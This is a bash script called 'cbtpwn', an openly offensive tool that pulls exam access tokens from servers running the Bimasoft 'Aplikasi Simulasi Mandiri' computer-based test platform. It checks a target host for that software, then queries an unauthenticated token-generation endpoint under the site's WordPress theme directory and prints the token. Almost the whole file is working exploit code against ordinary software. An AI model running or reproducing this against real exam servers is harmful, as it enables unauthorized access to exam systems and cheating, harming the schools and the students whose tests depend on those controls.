#!/usr/bin/bash

# ------------------------------------------------------------------------------
#
#   Copyright vanillamilkk 2021
#   This program is licensed under GNU General Public License v3.0
#
#   Aplikasi Simulasi Mandiri Token Generator (cbtpwn)
#   Tested on v12.2.7
#
# ------------------------------------------------------------------------------

# Welcome message
echo -ne "CBTPWN! Bimasoft Token Generator
 _______  _______  _______  _______  _     _  __    _ 
|       ||  _    ||       ||       || | _ | ||  |  | |
|       || |_|   ||_     _||    _  || || || ||   |_| |
|       ||       |  |   |  |   |_| ||       ||       |
|      _||  _   |   |   |  |    ___||       ||  _    |
|     |_ | |_|   |  |   |  |   |    |   _   || | |   |
|_______||_______|  |___|  |___|    |__| |__||_|  |__|


Copyright vanillamilkk 2021
This program is licensed under GNU General Public License v3.0
-----------------------------------------------------------------"

# Check if argument is passed
if [ $# -eq 0 ]
  then
    echo -e "\nInvalid argument!"
    echo -e "Usage : ./token <server>"
    echo -e "Example : ./token test.co.id"
    exit 1
fi

# Check if server is valid 
if [[  $(echo $@ | grep -P '(?=^.{5,254}$)(^(?:(?!\d+\.)[a-zA-Z0-9_\-]{1,63}\.?)+(?:[a-zA-Z]{2,})$)') ]]
    then
      echo -ne "\nServer: $@"
    else
      echo -e "\nInvalid server, make sure it's correct!"
      exit 1
fi 

# Check if Aplikasi Simulasi Mandiri is supported
echo -ne "\nChecking server version..."
if [[ $(curl -s "https://$@/" | grep "Aplikasi Simulasi Mandiri") ]]
    then
      echo -ne "\nServer is valid, continue"
    else
      echo -e "\nInvalid server, not an Bimasoft v12 instances"
      exit 1
fi

echo -ne "\nConnecting to $@\n\n\n"
IFS="-" read -a array <<< $(curl -s "https://$@/wp-content/themes/unbk/api-18575621/generatetoken.php")
echo -ne " Token : ${array[0]}\n\n"
echo -ne "${array[1]}-"
echo -ne "${array[2]}-"
echo -ne "${array[3]}"
echo -ne "\n${array[4]}"
echo -ne "\n"
exit 1
